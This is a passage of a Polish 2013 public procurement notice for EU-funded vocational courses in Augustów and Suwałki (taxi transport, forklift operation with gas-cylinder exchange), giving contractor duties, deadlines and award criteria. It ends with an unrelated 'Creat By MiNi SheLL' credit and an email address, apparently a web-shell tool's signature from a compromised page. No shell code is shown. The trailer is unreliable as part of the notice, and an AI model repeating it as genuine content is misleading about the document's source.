Zajęcia teoretyczne odbywać się powinny pomiędzy godziną 8.00, a 18.00. Zajęcia praktyczne odbywać się będą wg grafiku ustalonego z uczestnikami kursu.Wykonawca zapewni:Każdorazowo podczas zajęć teoretycznych serwis kawowy podczas zajęć teoretycznych (kawa, herbata, cukier, naczynia jednorazowe, śmietanka) oraz ciepły posiłek (składający się z min. drugiego dania) w trakcie zajęć teoretycznych, jeżeli ich wymiar dzienny przekracza 5 godz. dydaktycznych, Badania lekarskie dla uczestników kursu zawodowego,Koszt jednokrotnego egzaminu zewnętrznego potwierdzającego nabycie uprawnień w zakresie przedmiotu szkolenia, wymaganego przepisami prawa warunki lokalowe zgodne z ww rozporządzeniem,Zaplecze techniczne (tj. przede wszystkim: autobus, plac manewrowy),dostęp do pomieszczeń sanitarnych w budynku, gdzie odbywają się zajęcia (WC, umywalka, niezbędne środki czystości),oznaczenia pomieszczeń, w których będą odbywać się szkolenia, materiałów szkoleniowych oraz wszelkich innych dokumentów związanych z realizacją przedmiotu zamówienia logotypami POKL i UE.Miejsce szkolenia:zajęcia teoretyczne: na terenie powiatu Miasta Suwałki lub powiatu suwalskiego lub powiatu augustowskiego,zajęcia praktyczne muszą być przeprowadzone w powiecie: augustowskim, i-lub suwalskim i-lub Miasta Suwałki). Uczestnicy szkolenia powinni otrzymać na własność: aktualny podręcznik (lub skrypt) w zakresie przedmiotu zamówienia, ćwiczenia z testami egzaminacyjnymi w zakresie danej kategorii kursu. Sposób sprawdzania efektów szkolenia: egzamin wewnętrzny teoretyczny i praktyczny zgodnie z rozporządzeniem, o którym mowa w pkt. 3. Wykonawca zamówienia sporządzi protokół z przebiegu egzaminu wewnętrznego.Po ukończeniu szkolenia osoby otrzymują zaświadczenie zgodnie z rozporządzeniem o którym mowa w pkt. 3. Wykonawca jest zobowiązany do organizacji i poniesienia kosztów wymaganych badań lekarskich.Wykonawca jest zobowiązany do opłacenia pierwszego egzaminu państwowego dla osób, które ukończyły szkolenie i zdały egzamin wewnętrzny.Wykonawca zobowiązany jest do rejestracji instytucji i przedmiotu zamówienia na portalu www.inwestycjawkadry.info.pl. Zamawiający wymaga w przypadku realizacji szkolenia metodą e-learningową lub metodą blended learningowi prowadzenia min. zajęć w siedzibie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa organizacji i przeprowadzenie szkolenia/kursu Transport drogowy taksówką uprawniającą do wykonywania działalności gospodarczej w zakresie przewozu osób taksówką..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób do przeszkolenia:1 osoba.Pożądany termin szkolenia: w okresie od dnia zawarcia umowy do 25 luty 2013 r.Szkolenie musi być przeprowadzone w oparciu o przepisy: ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. 2012 r., poz. 1265) oraz Rozporządzenia Ministra Infrastruktury z dnia 7 lutego 2002 r. w sprawie programu szkolenia, wzoru zaświadczenia oraz wysokości opłat za szkolenie i egzaminowanie w zakresie transportu drogowego taksówką (Dz. U. 2002 r. Nr 12, poz. 118 z późn. zm.).Ilość godzin szkolenia przypadająca na 1 uczestnika:28 godzin/1 osoba.Zajęcia teoretyczne odbywać się powinny pomiędzy godziną 8.00, a 18.00. 
Wykonawca zapewni:Każdorazowo podczas zajęć teoretycznych serwis kawowy podczas zajęć teoretycznych (kawa, herbata, cukier, naczynia jednorazowe, śmietanka) oraz ciepły posiłek (składający się z min. drugiego dania) w trakcie zajęć teoretycznych, jeżeli ich wymiar dzienny przekracza 5 godz. dydaktycznych:Badania lekarskie dla uczestników kursu zawodowego,Koszt jednokrotnego egzaminu przeprowadzonego przez Starostwo Powiatowe w Augustowie,warunki lokalowe zgodne z ww rozporządzeniem,dostęp do pomieszczeń sanitarnych w budynku, gdzie odbywają się zajęcia (WC, umywalka, niezbędne środki czystości),oznaczenia pomieszczeń, w których będą odbywać się szkolenia, materiałów szkoleniowych oraz wszelkich innych dokumentów związanych z realizacją przedmiotu zamówienia logotypami POKL i UE.Miejsce szkolenia: Augustów.Uczestnik szkolenia powinien otrzymać na własność: aktualny podręcznik (lub skrypt) w zakresie przedmiotu zamówienia, ćwiczenia z testami egzaminacyjnymi w zakresie danej kategorii uprawnień.Sposób sprawdzania efektów szkolenia: egzamin wewnętrzny teoretyczny. Wykonawca zamówienia sporządzi protokół z przebiegu egzaminu wewnętrznego.Po ukończeniu szkolenia osoby otrzymują zaświadczenie zgodnie z rozporządzeniem o którym mowa w pkt. 3.Wykonawca jest zobowiązany do organizacji i poniesienia kosztów wymaganych badań lekarskich.Wykonawca jest zobowiązany do opłacenia pierwszego egzaminu w Starostwie Powiatowym w Augustowie dla osoby, pod warunkiem, że osoba ta ukończyła szkolenie i zdała egzamin wewnętrzny.Wykonawca zobowiązany jest do rejestracji instytucji i przedmiotu zamówienia na portalu www.inwestycjawkadry.info.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa organizacji i przeprowadzenia szkolenia/kursu Operator wózków widłowych z wymianą butli gazowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób do przeszkolenia: 1 grupa  x 8 osób.Pożądany termin szkolenia: w okresie od dnia zawarcia umowy do 10 marca 2013 r. Szkolenie musi być przeprowadzone w oparciu o przepisy Rozporządzenia Ministra Gospodarki z dnia 18 lipca 2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz.U. z 2001r, Nr 79, poz. 849, z późn. zm.) regulujące organizację przedmiotowego szkolenia w zakresie przygotowującym do egzaminu przed Urzędem Dozoru Technicznego w celu uzyskania przez niego uprawnień operatora wózków jezdniowych podnośnikowych wraz z bezpieczną wymianą butli gazowych.Ilość godzin szkolenia przypadająca na 1 uczestnika:44 godz. teorii z zakresu obsługi wózków widłowych-8 osób/ 1 grupa, zajęcia praktyczne z zakresu obsługi wózków widłowych - 15 godzin/1 osoba x 8 osób/1 grupa, 8 godzin zajęć praktycznych z zakresu wymiany butli gazowych na 1 osobę x 8 osób/1 grupa. Zajęcia teoretyczne odbywać się powinny pomiędzy godziną 8.00, a 18.00. Zajęcia praktyczne odbywać się będą wg. grafiku ustalonego z uczestnikami kursu.Wykonawca zapewni:Każdorazowo podczas zajęć teoretycznych serwis kawowy podczas zajęć teoretycznych (kawa, herbata, cukier, naczynia jednorazowe, śmietanka) oraz ciepły posiłek (składający się z min. drugiego dania) w trakcie zajęć teoretycznych, jeżeli ich wymiar dzienny przekracza 5 godz. dydaktycznych.Badania lekarskie dla uczestników kursu zawodowego,Koszt jednokrotnego egzaminu zewnętrznego przed Urzędem Dozoru Technicznego potwierdzającego nabycie uprawnień w zakresie przedmiotu szkolenia,wymaganego przepisami Rozporządzenia Ministra Gospodarki z dnia 18 lipca 2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych. (Dz.U. z 2001r, Nr 79, poz. 849, ze zm.) warunki lokalowe zgodne z w/w rozporządzeniem,Zaplecze techniczne (tj. przede wszystkim: wózek widłowy, plac manewrowy, butle gazowe do zajęć z zakresu wymiany butli gazowych), dostęp do pomieszczeń sanitarnych w budynku, gdzie odbywają się zajęcia (WC, umywalka, niezbędne środki czystości),oznaczenia pomieszczeń, w których będą odbywać się szkolenia, materiałów szkoleniowych oraz wszelkich innych dokumentów związanych z realizacją przedmiotu zamówienia logotypami POKL i UE, ubezpieczyć uczestników na cały czas trwania szkolenia (od dnia rozpoczęcia szkolenia) od następstw nieszczęśliwych wypadków. Kserokopię polisy należy dostarczyć do Zamawiającego najpóźniej na dwa dni przed planowanym rozpoczęciem szkolenia, a w przypadku kiedy okres od podpisania umowy do rozpoczęcia szkolenia będzie krótszy, to najpóźniej w dniu rozpoczęcia. Miejsce szkolenia:	Augustów, Uczestnicy szkolenia powinni otrzymać na własność: aktualny podręcznik (lub skrypt) w zakresie przedmiotu zamówienia, ćwiczenia z testami egzaminacyjnymi w zakresie danej kategorii kursu.Sposób sprawdzania efektów szkolenia: egzamin wewnętrzny teoretyczny i praktyczny zgodnie z wymaganiami,  o których mowa w pkt. 3. Wykonawca zamówienia sporządzi protokół z przebiegu egzaminu wewnętrznego.Szkolenie powinno zakończyć się egzaminem przed komisją egzaminacyjną z Urzędu Dozoru Technicznego oraz wydaniem zaświadczeń kwalifikacyjnych UDT uprawniających do obsługi wózka widłowego z uprawnieniami bezpiecznej obsługi-wymiany butli gazowych wraz z CERTYFIKATEM UDT ważnym w krajach UE.Wykonawca jest zobowiązany do organizacji i poniesienia kosztów wymaganych badań lekarskich.Wykonawca jest zobowiązany do opłacenia pierwszego egzaminu państwowego dla osób, które ukończyły szkolenie i zdały egzamin wewnętrzny.
Wykonawca zobowiązany jest do posiadania zatwierdzonego przez Urząd Dozoru Technicznego programu szkolenia/kursu operatorów  wózków widłowych z wymianą butli gazowych. Kopie zatwierdzonego programu Wykonawca zobowiązany jest złożyć wraz z ofertą.Wykonawca zobowiązany jest do rejestracji instytucji i przedmiotu zamówienia na portalu www.inwestycjawkadry.info.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com